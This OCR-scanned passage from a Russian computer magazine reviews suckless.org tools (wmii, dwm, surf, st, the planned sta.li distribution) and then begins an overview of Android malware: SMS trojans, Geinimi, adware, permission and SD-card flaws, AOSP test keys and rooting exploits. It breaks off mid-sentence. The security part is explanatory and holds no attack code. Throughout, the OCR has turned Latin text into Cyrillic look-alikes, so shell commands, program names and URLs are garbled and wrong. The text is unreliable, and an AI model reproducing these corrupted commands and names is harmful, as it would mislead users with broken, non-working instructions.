ему возможные варианты. При этом в качестве 
источников информации могут быть использо- 
ваны фактически любые текстовые данные, на- 
чиная от списка файлов в каталоге /изг/Ьіп (для 
запуска приложений) и заканчивая специально 
сформированными списками из часто выполняе- 
мых действий. 

В качестве другого варианта интеграции 
приложений можно привести минималистич- 
ный браузер зигб который сам по себе умеет 
открывать только по одной странице в окне, но 
легко превращается в браузер с поддержкой 
табов при использовании совместно с бѵѵт 
(в режиме тайлинга) или минималистичным 
приложением ІаЬЬесІ, объединяющим несколь- 
ко окон приложения в одно окно с несколькими 
вкладками (нечто похожее есть в менеджере 
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Демонстрация фреймового и плавающего подхода 
к размещению окон в ѵѵтіі 




Среда Асте из РІап 9, с которой был скопирован интерфейс ѵѵтіі 



сітепи выглядит как строка с предложением вариантов, 
которую можно разместить в любой части экрана 



окон ЛихЬох). Точно такой же способ запуска 
подходит и для других однооконных прило- 
жений вроде эмулятора терминала зТ В до- 
полнение к этим инструментам пользователю 
предлагается также несколько подсобных 
утилит для просмотра списка окон, управления 
их именами, положением курсора и так далее, 
которые могут быть полезны при написании 
простых скриптов автоматизации действий. 

Всего сообществом зискіезз.огд создано 
более пятнадцати различных приложений. Из 
них наиболее интересны: 

• ѵѵтіі — фреймовый менеджерокон, основан- 
ный на идеяхсреды Асте из РІап 9 и графиче- 
ского интерфейса ОС ОЬегоп; 

• сіѵѵт — минималистичный фреймовый ме- 
неджерокон, созданный под впечатлением 
от ѵѵтіі; 

• зигі — простой и легкий веб-браузерна 
движке ѴѴеЬКіС 

• 5І — простой, но полноценный эмулятор 
терминала; 

• 9Ьа5Ѳ — набор стандартных О МІХ-команд, 
портированныхиз РІап 9; 

• сітепи — простая, ночрезвычайноудобная 
система меню, используемая совместно 
сдругими приложениями; 

• іі — ІРС-клиент, реализованный в виде вир- 
туальной файловой системы; 

• запсіу — простой, нофункциональныйтек- 
стовый редактор, расширяемый с помощью 
скриптов; 

• зіоск — самый простой вмиреблокировщик 
экрана; 

• 5ѵкЬ — наэкранная клавиатура для сенсор- 
ныхэкранов; 



• (аЬЬесІ — приложениеобъединения множе- 
ства окон в одно окно с множеством вкладок. 

Некоторые мы рассмотрим подробнее в сле- 
дующих разделах статьи. 




ѵѵтіі (ѴѴіпсІоѵѵ Мападег ІтргоѵесІ ІтргоѵесІ) — это 
фреймовый менеджер окон для X ѴѴіпсІоѵѵ, соз- 
данный под впечатлением от интерфейса среды 
разработки Асте из операционной системы 
РІап 9 и по модели неперекрывающихся окон 
и конфигурирования/управления с помощью 
записи данных в псевдофайловую систему. До 
недавнего времени он входил в число дочерних 
проектов зискіезз.огд, но после расширения 
функционала перестал удовлетворять требова- 
ниям сообщества и отпочковался в отдельный 
проект, который теперь можно найти на страни- 
це Зоодіе Собе: собе.доодіе.сот/р/ѵѵтіі . 

В контексте этого обзора ѵѵтіі интересен 
прежде всего тем, что он (точнее, его первая 
версия — ѵѵті) стал одним из первых минима- 
листичных менеджеров окон, вобравших в себя 
функциональность и свойства, которые затем 
были многократно скопированы в другие при- 
ложения. Несмотря на существенно больший по 
сравнению сдругими проектами зискіезз.огд 
размер, он продолжает сохранять идеологию 
минималистичного приложения, в умелых руках 
способного на многое. 

Основная идея ѵѵтіі заключается в том, 
чтобы избавить пользователя от необходимо- 
сти вручную располагать окна на экране и в 
то же время сделать так, чтобы любое окно 
всегда находилось на экране и было доступно 



пользователю. Достигается это несколькими 
путями. Во-первых, ѵѵтіі никогда не накла- 
дывает окна друг на друга, размещая их так, 
чтобы все доступное пространство экрана было 
разделено между всеми окнами. Во-вторых, 
ѵѵтіі разбивает все доступное пространство на 
несколько виртуальных столбцов, заполняя их 
вновь открывающимися окнами. Общая логика 
работы при этом следующая: по умолчанию мы 
имеем два столбца. После запуска первого при- 
ложения его окно полностью заполняет собой 
первый столбец, второе приложение заполнит 
второй столбец, третье будет добавлено ко 
второму так, что они разделят столбец на две 
равные части, четвертое отнимет половину 
пространства у третьего, и второй столбец ока- 
жется разбитым на три части: первая половина 
будет отдана второму приложению, а вторая 
поделена междутретьим и четвертым. 

Поначалу такое поведение менеджера окон 
кажется странным, нелогичным и неудобным, 
однако на самом деле оно как нельзя лучше 
подходит для повседневной работы пользо- 
вателя. Просто вспомни, как ты используешь 
свой комп, и все сразу встанет на свои места. 
Стандартный джентльменский набор любого 
современного пользователя примерно следую- 
щий: браузер, который открыт почти всегда, 
почтовый или ]'аЬЬег-клиент, располагающийся 
в небольшом окне, музыкальный проигры- 
ватель и прога для системного мониторинга. 
Пользуясь стандартным ОЕ, ты, скорее всего, 
будешь держать браузер открытым на весь 
экран, а к остальным приложениям обра- 
щаться по мере необходимости, или откроешь 
браузер на большую часть экрана, а справа 
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расположишь все остальное (стандартный 
подход в современном мире мониторов 16:9). 

Но зачем напрягаться, если менеджер окон 
может сделать все за тебя? Просто запускаем 
софтины по порядку и получаем ровно то, что 
нужно. Браузер, открытый на большую часть 
экрана, )аЬЬег-клиент в правой части плюс два 
окна поменьше для размещения аудиопле- 
ера и монитора загрузки. В любой моментты 
сможешь изменить размеры окон так, как тебе 
удобнее, просто потащив их за край. Закончив 
работу, конфигурацию окон можно сохранить. 
Представь, насколько удобно будет исполь- 
зовать в такой конфигурации бітр и другие 
многооконные приложения. Вторая отличи- 
тельная черта ѵѵтіі — использование меток 
вместо концепции рабочих столов. Каждое 
окно, управляемое ѵѵтіі, имеет метку, которая 
привязывает его к определенному рабочему 
пространству (рабочему столу, проще говоря), 
создаваемому динамически после создания 
новой метки. При этом, в отличие от класси- 
ческих менеджеров окон, окна могут иметь 
несколько меток, благодаря чему их можно 
размещать на нескольких столах одновремен- 
но. Например, разместить монитор загрузки на 
всех рабочих столах, а )аЬЬег-клиент на столах 
ѵѵогк и ѵѵеЬ. Обычно пользователи назначают 
метки приложениям во время конфигуриро- 
вания, поэтому никакой лишней возни после 
запуска софтины не потребуется. Наконец, са- 
мая неоднозначная функция ѵѵтіі — это метод 
управления и конфигурирования с помощью 
записи строк в виртуальную файловую систему. 
Эта функция досталась ѵѵтіі в наследство 
от РІап 9, в котором файлами представлено 
абсолютно все — от окон и курсора мыши до 
сетевого стека и почтового приложения. Ты 
можешь легко управлять ѵѵтіі с помощью мыши 
и клавиатуры, но любое действие также можно 
выполнить путем записи в определенные фай- 
лы. Так, чтобы получить список окон текущего 
рабочего пространства, нужно набрать: 

$ ытііг геасі /1;а§/5е1/іпсіех 

Чтобы присвоить окну с кодом 0x1000004 
новый набор меток: 

$ есбо «1:е5І:+1:егт5» | ышііг ыгіііе \ 

/с1іеп1:/0х1000004/1:а§5 

Перемещаем текущее окно в левую колонку: 

$ есбо "5ѲПСІ 5е1 1еТі:" | ытііг ыгіііе \ 

/1:а^/5е1/с1:1 

Собственно, именно таким образом и про- 
исходит конфигурирование менеджера окон, 
а также автоматизация рутинных действий. 



оѵѵм 



Менеджер окон бѵѵт ( сіѵѵт.зискіезз.огд ) — 
жемчужина всей коллекции зискіезз.огд 
и образец для подражания. Исходный код этого 
приложения занимает всего 2000 строк, но его 
функциональности вполне хватает, чтобы со- 



ставить конкуренцию описанному выше ѵѵтіі, 
более облегченной версией которого он, по 
сути, и является. 

Как и его старший собрат, бѵѵт следует 
концепции фреймового расположения непере- 
крывающихся окон и использования меток 
в качестве альтернативы рабочим столам. Как 
и ѵѵтіі, он поддерживает плавающие окна, что 
может быть полезно при использовании специ- 
фического ПО, а также для вывода различных 
предупреждающих и диалоговых окон. В верх- 
ней части окна бѵѵт располагается статусная 
строка, отображающая информацию о текущих 
рабочих пространствах, список окон, а также 
определенную пользователем информацию, 
для установки которой достаточно изменить 
имя корневого окна X ѴѴіпбоѵѵ: 

$ хзе1:гоо1: -паше 'сіа1;е' 

Пользуясь этим трюком, в статусбар можно 
вывести любую информацию, достаточно лишь 
написать скрипт, который будет обновлять имя 
корневого окна через определенные промежут- 
ки времени. 

Управлять самим менеджером окон можно 
с помощью мыши и клавиатуры, причем для 
изменения комбинаций клавиш придется 



отредактировать заголовочный файл сопПд.Ь 
в каталоге исходников, а затем пересобрать 
приложение. Таким же образом можно изменить 
цветовую схему, используемые шрифты и другие 
параметры приложения. На странице бѵѵт ты 
найдешь множество примеров конфигураций, 
а также скриптов и отдельных приложений для 
обновления информации в статусной строке. 



5УРГ 



Веб-браузер зиг^ ( зигТзискІезз.огд ) — еще 
один пример минималистичного, но эффектив- 
ного дизайна приложения. Фактически это ми- 
нимальная графическая обертка вокруг ѴѴеЬКіІ 
без какого-либо интерфейса, полностью 
управляемая с помощью клавиатуры. Главное 
достоинство зигі" в его чистоте, которая по- 
зволяет сосредоточиться на веб-серфинге, 
а не элементах оформления. Единствен- 
ный графический элемент зиг^ — это сама 
страница, дополненная небольшой полосой 
внизу, показывающей прогресс загрузки. 
Название страницы и ее адрес отображается 
в заголовке окна, адресная строка реализо- 
вана в виде бтепи, который появляется после 
нажатия комбинации <СігІ+д>. Для реализации 
вкладок используются возможности тайлового 
менеджера окон, такого как бѵѵт и ѵѵтіі, либо 
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Конфиг сіѵѵт написан на Си, но его легко читать и править 





Даже названия для 
своих приложений 
разработчики зиск- 
іезз.огд выбирают, 
полностью следуя 
принципам ІІМІХ; эти 
названия простые, 
так что их можно 
легко запомнить 
и быстро набрать. 

Сайт зискіезз.огд 
создан с исполь- 
зованием 
минималистичного 
веб-фреймворка 
ѵѵегс, состоящего из 
набора зЬ-скриптов, 
а страницы 
обновляются 
с помощью 
синхронизации 
репозитория 
МегсигіаІ. 

Лозунг сообщества 
зискеізз.огд «зоИ- 
ѵѵагеІНаІзискзІезз» 
можно перевести 
как «софт, который 
не так плох, как 
другой» (хотя 
нецензурный 
вариант перевода 
отражает суть 
гораздо лучше). 



Кроме тайлового, сІѵѵт поддерживает также и плавающее размещение окон 
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Строка состояния и календарь, созданные с помощью сігеп 

приложения ІаЬЬесІ. Браузер имеет минималь- 
ную поддержку пользовательских скриптов, 
С55-стилей и умеет сохранять соокіез, однако 
в нем нет механизма сохранения паролей, 
поддержки закладок (а кто-то ими еще поль- 
зуется?) и других возможностей современных 
браузеров. Многие из них можно реализовать 
с помощью внешних скриптов на языке зЬ, ко- 
торые легко найти на официальной страничке 
приложения. 

Стоит сказать, что благодаря скорости и от- 
сутствию интерфейса зигі" очень удобно исполь- 
зовать для запуска различных веб-приложений 
и быстрого поиска нужной информации. Напри- 
мер, скрипт для поиска в боодіе с помощью зиг^ 
может выглядеть так: 

#! /Ьіп/зіі 

диегу='есІіо $@ | 1;г ' ' ' + 

зиг-Р Іі1:1:р://ыыы.§оо§1е. ги/зеагсІі?д=$диегу 

Сценарий принимает один аргумент — 
строку поиска и выводит результаты в новом 
окне зигС 




Третье приложение главной тройки зискіезз. 
огд — это зі ( зСзискІезз.огд ), простейший, но 
полноценный эмулятор терминала, обладаю- 
щий невероятной скоростью работы. Он реали- 
зует поддержку терминала ѴТ100, 256 цветов, 
СІТР-8, поддержку копирования/вставки сред- 
ствами XII, а также сглаженных шрифтов. Его 
размер, как и большинства других проектов, не 
превышает 10 000 строк кода, а конфигурирова- 
ние осуществляется на этапе сборки с помощью 
заголовочного файла сопЯд.Ь. 

При всем минимализме в составе зі есть 
абсолютно все, что требуется от современного 
терминала, поэтому, даже если ты не являешь- 
ся приверженцем продуктов зискіезз. огд, я бы 
все равно порекомендовал использовать его 
вместо других раздутых альтернатив и уж тем 
более заменить им такой кусок запутанного 
кода, какхіегт. 



9ВА5Е 



9Ьазе — это набор стандартных команд ІІМІХ, 
в свое время написанный Робом Пайком, Кеном 
Томпсоном и Ко для операционной системы 
РІап 9, а затем портированный для Ыпих/ 
РгееВ50/Мас05Х Расом Коксом в рамках про- 
екта р1ап9рогЕ Достоинство 9Ьазе в простоте, 
скорости работы и независимости от каких- 




либо библиотек. Пакет включает в себя такие 
утилиты, как аѵѵк, са\, бсі, сІіі'Т би, есЬо, Із, ткбіг, 
и многие другие. 

Сам по себе 9Ьазе не несет какой-либо прак- 
тической пользы для юниксоидов, однако его 
применение планируется в минималистичном 
гиковом дистрибутиве зіа.іі. 



БТА.и 



Наиболее амбициозный проект всего сообще- 
ства зискеіезз.огд — это дистрибутив зіа.іі 
(5ТАІІС Ыпих), создаваемый по всем канонам 
СІМІХ-философии, принципа проектирования 
КІ55 и снабженный набором ПО, описанного 
в предыдущих разделах. Несмотря на то что 
дистрибутив до сих пор находится в стадии 
планирования и обсуждения, не описать его 
возможности и преимущества мы просто не 
имеем права. Слишком интересен сам проект. 

Центральная идея зіа.іі — сквозная, 
предельная и всеохватывающая простота 
любых компонентов системы, располагающих- 
ся выше ядра Ыпих. В основе такой простоты 
лежит представление о статической линковке 
абсолютно всех исполняемых файлов и ис- 
пользовании более простого, в сравнении с ЕЕР, 
формата исполняемых файлов, который не 
требует динамического связывания (например, 
а.оиі). Такой подход, по мнению авторов, сделает 
работу дистрибутива быстрой, а также избавит 
от многих проблем современных дистрибутивов, 
связанных с различием в версиях библиотек, 
и устранит загромождение файловой системы. 
Само ядро также должно быть большей частью 
монолитным с вынесением в модули только 
драйверов для оборудования, появление которо- 
го в системе предсказать трудно (например, раз- 
личных СІБВ-устройств). От начальной файловой 
системы (іпіігсі, іпіігаті'з), используемой для 
инициализации ОС, также решено отказаться, 
поместив весь дистрибутив в РАМ-диск. Это по- 
зволит еще более ускорить работу системы, сде- 
лав ее практически молниеносной, не загромоз- 
див место в памяти (учитывая минималистичную 
натуру дистрибутива, можно предположить, что 
для ее хранения понадобится не больше 256 или 
даже 128 Мб оперативной памяти). Грузить все 
это должен не обремененный бессмысленным 
функционалом загрузчик Іііо. Предполагается, 
что в дистрибутиве вообще не будет какой-либо 
системы пакетного менеджмента, место которой 
займет обычный гзупс, он будет синхронизиро- 
вать исходный код всех компонентов, после чего 
произойдет пересборка устаревших приложе- 



ний. Сама по себе структура файловой системы, 
содержащей компоненты системы, также сдела- 
на максимально простой и незагроможденной: 

/Ьіп - исполняемые файлы 

/Ьоо1; - ядро и загрузчик 

/сіеѵ - устройства 

/е1;с - конфигурационные файлы 
/5ѵс - сервисы^ сетевые и локальные 
/боте - каталоги пользователей 

/Г 00 ІІ - каталог суперпользователя 

/ѵаг - стандартный каталог для 

изменяющихся данных (5роо1^ гип^ 1о§^ 
сасбе) 

/збаге - тап-страницьц локали и файлы 
приложений 

/сіеѵеі - окружение сборки и разработки 

Обрати внимание на отсутствие каталогов 
/изг, /зЬіп, /изг/іосаі и прочего хлама, кото- 
рый до сих пор можно найти в любом Ыпих- 
дистрибутиве, хотя смысла во всем этом много- 
образии каталогов уже давно нет. 



выводы 



«Совершенство архитектуры достигается не 
тогда, когда вы не можете ничего добавить, 
а тогда, когда вы не можете ничего удалить» — 
слова Антуана де Сент-Экзюпери, которые 
не раз цитировал один из самых ярых за- 
щитников концепции ІІМІХ и принципа КІ55 
Эрик Реймонд. К сожалению, слишком многие 
программисты не следуют этой мудрости: ІІМІХ/ 
Ыпих превратилась в толстую и громоздкую 
операционную систему, надежность и эффек- 
тивность работы которой уже давно не выше 
тех же показателей продуктов всем известной 
компании. 



ДРУГИЕ ПРИЛОЖЕНИЯ 



Существует также множество других 
приложений, которые не принадлежат 
сообществу зискіезз. огд, но разрабатываются 
по его правилам. Это, например, динамический 
е-таіі-клиент сітс ( ба. зискіезз. огд/сіппс і. 
популярная утилита для вывода 
информационных блоков сііеп ( аоо.аІ/8к06М І 
и менеджер паролей раззтап ( аоо.д1/НгМр) 1. 
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ВИРУСЫ, БЭКДОРЫ, 
КЕЙЛОГГЕРЫ 
И УЯЗВИМОСТИ АИОКОІВ 



За каких-то три года никому не 
известная мобильная опера- 
ционная система корпорации 
боодіе из аутсайдера пре- 
вратилась в лидера на рынке 
мобильных ОС. Но вслед за по- 
пулярностью пришли не толь- 
ко именитые программисты, 
но и вирусописатели, запо- 
лонившие интернет огромным 
количеством вредоносного ПО, 
которое сегодня можно найти 
даже в репозитории Ооодіе РІау. 
Что это, тотальная уязвимость 
Апбгоісі или всего лишь след- 
ствие популярности? 



ВВЕДЕНИЕ 



Первое вредоносное приложение для ОС 
АпсІгоісІ было написано в июне 2010 года ис- 
следователями из компании Тгизіѵѵаѵе и пред- 
ставлено на конференции ОЕР СОМ. В августе 
ТОГО же года «Лаборатория Касперского» об- 
наружила первый СМС-троян для АпсІгоісІ под 
названием РакеРІауег, который опустошал счет 
жертвы, отправляя сообщения на короткие 
платные номера. 

Уже в следующем году начался настоящий 
бум вирусов для АпсІгоісІ самых разных мастей 
и раскрасок, вирусы становились все сложнее 
и изысканнее. К концу 2011 года аналитики 
подтвердили, что 65% всех мобильных вирусов 
поражают именно АпсІгоісІ, а общая скорость 
роста количества вирусов уже превысила 
СОТНИ процентов. 



С чем связан такой бурный уровень роста 
вредоносного ПО, почему ОоодІе не пред- 
принимает решительных действий по борьбе 
с заразой, какие типы вирусов существуют для 
АпсІгоісІ и как защитить свой смартфон от них — 
обо всем ЭТОМ мы поговорим в данной статье. 



ЗУБАСТЫЙ ЗООПАРК 



Со времен появления первых вирусов для 
АпсІгоісІ были созданы практически все воз- 
можные типы вредоносных приложений, 
известных человечеству. Особое место среди 
них заняли СМС-трояны, как наиболее простые 
и эффективные для зарабатывания денег. 

Позже ПОЯВИЛИСЬ полноценные троянские 
приложения, позволяющие собирать кон- 
фиденциальную информацию и управлять 
смартфоном; программы-шпионы, фактически 
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Антивирус Касперского для АпсІгоісІ 



выполняющие туже роль, но открыто и легаль- 
ными путями; приложения, демонстрирующие 
навязчивую рекламу с помощью сервисов 
вроде АігРизЬ, размещающих рекламные со- 
общения в области уведомления Апбгоіб; боты, 
бэкдоры и полиморфные вирусы, изменяю- 
щие сами себя во время загрузки. Весь этот 
зоопарк расплодился по низкокачественным 
сайтам, файлообменникам, а некоторые эк- 
земпляры даже попали в Соодіе РІау (бывший 
АпсІгоісІ Магкеі). Как работают все эти типы 
вирусов? Посмотрим. 

• СМС-трояны. Это настоящая классика 
мобильной вирусологии. СМС-трояны дают 
отличную отдачу, позволяя быстро обога- 
титься на коде, который можно написатьза 
один час. Обычно СМС-троян представляет 
собой небольшое приложение (РакеРІауег 
весил всего 13 Кб), которое послеустановки 
уходит в фон и начинает слать сообщен ИЯ на 
заранее определенный платный короткий 
номер, опустошая твой мобильный счет 
и обогащая создателя. Часто такиетрояны 
выдают себя за вполне легальные прило- 
жения и игры (Орега Міпі, ІСО, 5куре, Апдгу 
Вігсіз), хотя иногда могут быть встроены 
в другое, возможно даже довольно каче- 
ственное приложение. В любом случае 
общая черта всех СМС-троянов в том, что 
передустановкой они требуют права на от- 
правку СМС, благодаря чему их очень легко 
идентифицировать. Антивирусы также 
легко идентифицируют та кой тип таіѵѵаге, 
относя его ксемейству АпсІгоісІ. ЗппзЭепсІ. 




• Полноценныетрояны. Гораздо более про- 
двинутый тип вредоносного ПО, способный 
дать злоумышленнику всю информацию 

о тебе, твоем устройстве, местоположе- 
нии и позволитьуправлятьсмартфоном 
удаленно. История настоящихтроянов для 
АпсІгоісІ началась с обнаружения АпсІгоісІ. 
Оеіпіті, который считается первым дей- 
ствительно качественным и полноценным 
приложениемтакоготипа. Оеіпіті был 
обнаружен специалистами Іоокоиі МоЬіІе 
Оесигііу в декабре 2010 года. Он внедрялся 
в легальное программное обеспечение, 
послеустановки которого брал управле- 
ние в свои руки и начинал сбор данных — 
координаты устройства, номера ІМЕІ и ІМ5І 
отправлялись на один из десяти удален- 
ных серверов. Троян способен принимать 
команды, с помощью которых с телефона 
можно удалить или установить приложе- 
ния (правда, для этих действий требуется 
подтверждение пользователя). Для обмана 
антивирусов Сеітіпі имеетобфускатор 
байткода, а также за шифрованные участки 
кода, которыезатрудняют отладку и ис- 
следование. Обнаружить Оеіпіті легко по 
требованию очень многих полномочий, 
которые совершенно не нужны стандартной 
программе или игре. 

• Шпионы. Фактически легальная ре- 
инкарнациятроянов, примеры которой 
можно найти даже в Ооодіе РІау. Отправ- 
ляют информацию о телефоне, владельце 
и местоположении на удаленный сервер, 
записывают телефонные разговоры, но 




делаютэто открыто (в некоторыхслучаях 
дажеспрашивая пользователя). Кэтомуже 
типу приложений можноотнести програм- 
мы для поиска потерянногосмартфона, 
шпионские камеры и прочий софт юных 
Джеймсов Бондов. Имеютпотенциальную 
опасность как инструмент, который может 
быть использован для «грязных дел», но по 
большому счету не представляют реальной 
угрозы. Определяютсятакже, кактрояны: 
по количеству за прошиваемых полномочий 
и названию (если юныйхацкер не смог его 
изменить). 

• Рекламныеагрессоры. Еще один тип 
легальныхприложений, которые могутсоз- 
датьощутимые проблемы пользователям. 
Представляютсобой приложения и игры, 
снабженные сервисным модулем, который 
остается работатьдаже послезакрытия 
самого приложения и время от времени 
размещаетрекламу в области уведомле- 
ний. Молотого чтотакойтип рекламных 
сообщений раздражает сам по себе, часто он 
используется для публикации сообщений, 
замаскированных под системные (напри- 
мер, «Требуется срочное обновление систе- 
мы» или «Появилась новая версия Бкуре»), 
чтоужеявляется неким мошенничеством. 

В Маркете достаточно много приложений 
с та КИМ подходом к отображению рекламы, 
одна ко большинство анти вирусов признают 
ихвредоносными, причисляя к различным 
семействам по имени рекламного про- 
вайдера (АсІѵѵаге.АігризЬ, АсІѵѵаге.ЕеасІЬои, 
АсІѵѵаге.ЗіагІарр и прочие). 
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Рост зловредного ПО для АпсІгоісІ приходится на период роста самого АпсІгоісІ 



СЛЕДУЮЩИЙ УРОВЕНЬ 



В большинстве своем все эти бэкдоры и про- 
чая нечисть используют стандартный АРІ 
АпсІгоісІ, а потому могут быть легко обнаруже- 
ны с помощью просмотра разрешений при- 
ложения перед установкой. Хочет, например, 
игра просматривать личные данные пользо- 
вателя — в топку ее, захотел браузер отправ- 
лять СМС-сообщения — не нужен нам такой 
браузер. Это не относится к последнему типу 
зловредных программ, однако они быстро вы- 
дают себя с помощью рекламных объявлений, 
к тому же пользователи обычно отписывают 
о таком поведении приложения прямо в ком- 
ментариях в боодіе РІау, так что идентифици- 
ровать их можно еще до установки. 

Совсем другое дело — вирусы и руткиты, 
использующие уязвимости и особенности 
системы безопасности АпсІгоісІ. С ними дела 
обстоят намного сложнее. Еще в феврале 
2011 года в АпсІгоісІ 2.3 была обнаружена 
уязвимость в веб-браузере АпсІгоісІ, которая 
позволяла получить доступ к содержимому 50- 
карты и выгрузить приложения пользователя 
на удаленный сервер. Все, что требовалось 
от пользователя при этом, — просто перейти 
по ссылке. К счастью, брешь была доволь- 
но быстро закрыта и уже давно не является 
актуальной. 

Спустя год, в марте 2012-го, была найде- 
на аналогичная уязвимость, проявлявшаяся 
в том, что приложение, вообще не имею- 
щее никаких полномочий в системе, может 
свободно читать содержимое 50-карты. Для 
демонстрации уязвимости Ральф Пути, а затем 
Пол Бродер создали приложения, которые по- 
лучают с 50-карты личные фотографии поль- 
зователя, а затем отправляют их на удаленные 
серверы. Причем реализация Бродера еще 
и позволяла получить список последних мест, 
где находился владелец смартфона, а для от- 
правки использовала обычный браузер, чтобы 
не создать подозрений, которые может вы- 
звать запрос на прямое интернет-соединение. 
Для определения местоположения использо- 



вался кеш «Галереи», в котором в незашифро- 
ванном виде хранилась информация о коорди- 
натах в момент съемки. 

Интересно, что, по заявлению боодіе, 
открытый доступ к 50-карте сам по себе во- 
все не уязвимость, а нормальное поведение 
любой системы, которая поддерживает работу 
со съемными накопителями. Это довольно 
спорное утверждение, однако в боодіе за- 
верили, что проблема с доступом конкретно 
к фотографиям и геолокационным данным 
в ближайшее время будет решена. Информа- 
ции о том, используют ли какие-то вирусы эту 
особенность, пока нет. 

В августе 2011 года специалисты компании 
Тгизіѵѵаѵе обнаружили еще более серьезную 
уязвимость в самом АпсІгоісІ АРІ. Оказалось, 
что любое приложение может штатными сред- 
ствами выяснить, какое приложение в данный 
момент является активным, и использовать 
эту информацию для выполнения фишинговых 
атак. К примеру, пользователь устанавливает 
безобидное приложение, которое при запуске 
создает фоновый процесс, отслеживающий 
активные приложения. В момент, когда поль- 
зователь запустит официальное приложение 
РасеЬоок, сервис автоматически покажет на 
экране фиктивное окно входа в РасеЬоок- 
аккаунт и перехватит его конфиденциальную 
информацию. Каких-либо разрешений для 
выполнения этого действия не потребуется, 
поэтому пользователь может даже не дога- 
даться, как все произошло, после обнаруже- 
ния утечки. 

Еще более серьезная проблема в системе 
безопасности АпсІгоісІ была найдена в декабре 
2011 года. Исследователи из Университета 
Северной Каролины опубликовали документ, 
содержащий информацию о не совсем точной 
реализации механизма разграничения при- 
вилегий в смартфонах крупнейших произво- 
дителей, в число которых вошли НТС, Моіогоіа 
и баппзипд. Оказалось, что многие безобидные 
с виду привилегии, реализованные в АпсІгоісІ, 
дают приложениям гораздо больше полномо- 
чий, чем требуется на самом деле. Исследова- 



тели нашли 13 лазеек, 11 из которых открыва- 
ли доступ к конфиденциальной информации 
пользователя. При этом наличие лазеек 
разнилось между производителями и даже 
моделями устройств. 

Еще один интересный способ обмана поль- 
зователей был обнаружен в трояне АпсІгоісІ. 
ЭтзНісІег, который заражал исключительно 
сторонние прошивки, созданные энтузиаста- 
ми. В основе механизма его распространения 
лежала особенность АпсІгоісІ, служащая для 
создания системных приложений: любое 
приложение, подписанное цифровым ключом 
самой прошивки, считается системным 
и устанавливается без вопросов к владельцу. 
Производители смартфонов пользуются этой 
возможностью для принудительной установки 
различных критических обновлений, однако 
при использовании сторонних прошивок она 
создает серьезную брешь в безопасности. 
Почти все они создаются на основе исходных 
текстов А05Р, содержащего тестовые ключи, 
доступные любому, кто скачает официальные 
исходники; при сборке прошивки эти ключи 
никто не изменяет, поэтому любой желающий 
может создать «системное приложение» для 
всех этих прошивок. Уязвимости была подвер- 
жена и популярная прошивка СуаподепМосІ, но 
после публикации информации о бреши проект 
перешел на использование приватных ключей. 

Наконец, король всех концептов — экс- 
периментальный троян ТарЕоддег, способный 
перехватывать вводимые пользователем дан- 
ные, используя гироскоп, датчик ориентации 
и акселерометр. Троян выполнен в виде полно- 
ценной игры, якобы проверяющей реакцию 
пользователя. Пользователю предлагается 
найти на экране определенные изображения 
и нажать на них. Во время каждого нажатия 
троян снимает показания с датчиков положе- 
ния и строит карту зависимости отклонения 
смартфона от координат изображения на экра- 
не. После недолгого обучения игра заверша- 
ется, оставив в системе фоновый сервис, кото- 
рый продолжает снимать данные с датчиков, 
эти данные отправляются на удаленный сервер 
и анализируются. Само собой разумеется, что 
единственная привилегия, которую требует 
троян, — это доступ к датчикам положения, что 
абсолютно нормально для любой игры и не вы- 
зовет подозрения у пользователя. К счастью. 




Большая часть зловредов появляется именно для АпсІгоісІ 
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Іоокоиі обнаружил троян ОгоісШгеат 



Реклама в области уведомлений (не очищается) 



Троян, замаскированный под системное обновление 



технология еще очень молодая и несовершен- 
ная, к тому же сложная в реализации, поэтому 
встретить ее «на воле» в ближайшее время 
вряд ли удастся. 

Все эти уязвимости позволяют бэкдорам 
и руткитам ввести пользователя в заблужде- 
ние и выдать себя за легитимное приложение 
с корректными правами доступа, однако на 
этом игра в технологии не заканчивается. Ока- 
завшись в системе, зараза может воспользо- 
ваться уязвимостями самого Ыпих и системных 
компонентов и получить права гооі и полное 
господство в системе, включая возмож- 
ность установки приложений без разрешения 
пользователя (как это делает бэкдор АпбгоісІ. 
Ап 2 Ьи), доступ к любой информации и возмож- 
ность окопаться так глубоко, что даже «сброс 
до заводских настроек» не поможет (ОВР 
ВооіКіІ размещает себя сразу после загрузчи- 
ка, что позволяет ему перехватить управление 
еще до загрузки самой ОС). 

Интересно, что для получения привилегий 
администратора трояны и вирусы исполь- 
зуюттехники, разработанные энтузиаста- 
ми для рутинга устройств. Это все те же 
эксплойты ЕхрІоісІ, РадеАдаіпзШпеСаде, 
КіІІіпдІпТЬеМате, 2ітрегисЬ, (ЗіпдегВгеак 
и так далее, которые эксплуатируют бреши 
в реализации Ьоіріид, библиотеке Ыопіс и си- 
стемных сервисах. Обычно после установки 
зловред проверяет наличие исполняемого 
файла /зузІет/Ып/зи, отсутствие которого 
сигнализирует о невозможности получить 
гооі-права, и запускает эксплойт, с помощью 
которого происходит доступ к привилегиям 



гооС а также установка этого самого файла. 
Если же файл найден, троян пытается полу- 
чить гооі штатными средствами, что приво- 
дит к генерации сообщения о запросе прав, 
на что пользователь должен ответить «да» 
или «нет». Этим зловред может выдать себя, 
однако большинство неграмотных пользо- 
вателей просто нажимают «да» и забывают 
о сообщении. Далее зловред может делать 
все, что захочет. 



КАК ПРОИСХОДИТ ЗАРАЖЕНИЕ 



Существует масса путей распространения вре- 
доносных мобильных приложений, начиная от 
варезных сайтов и заканчивая репозиторием 
Соодіе РІау, в котором время от времени на- 
ходят различные вирусы. Попробуем класси- 
фицировать эти пути. 

• Варезныесайты. Подавляющее большин- 
ствозаразы распространяется через варез- 
ные сайты. Их владельцы редко обращают 
внимание на качество ПО, поэтомузлоумыш- 
лен ники легко добиваются включения зара- 
женных приложений в каталоги. Наиболее 
распространентакой подход в Китае, однако 
заразу нетрудно подцепить и на англ оязыч- 
ныхили русскоязычныхсайтах. 

• Фишинговые сайты. Еще один популярный 
способ распространения вирусов. Злоумыш- 
ленник создает веб-страницу, копирую- 
щую популярный сайти предлагающую 
загрузить официальное приложение. Если 
пользователь не будет внимателен, он легко 
попадется на удочку и установит троян на 
свой смартфон. Также возможны варианты 



копирования интерфейса стандартных 
АпсІгоісІ -при ложен ИЙ, таких как РІау Магкеі, 
но на это попадутся разве что старушки 
и блондинки. 

• Реклама. Многие вирусописатели исполь- 
зуют для распространения своего детища 
рекламу в других мобильных приложениях. 
Наверняка ты заметил, что большую часть 
мобильной рекламы в России составля- 
ют сообщения вроде «Обновите Экуре», 
«1500 бесплатных при ложен ИЙ для вашего 
АпсІгоісІ», «Оптимизируйте свой Эепзаііоп» 
и та к да л ее. В большинстве случаев, если 
нажатьнатакой рекламный блок, перей- 
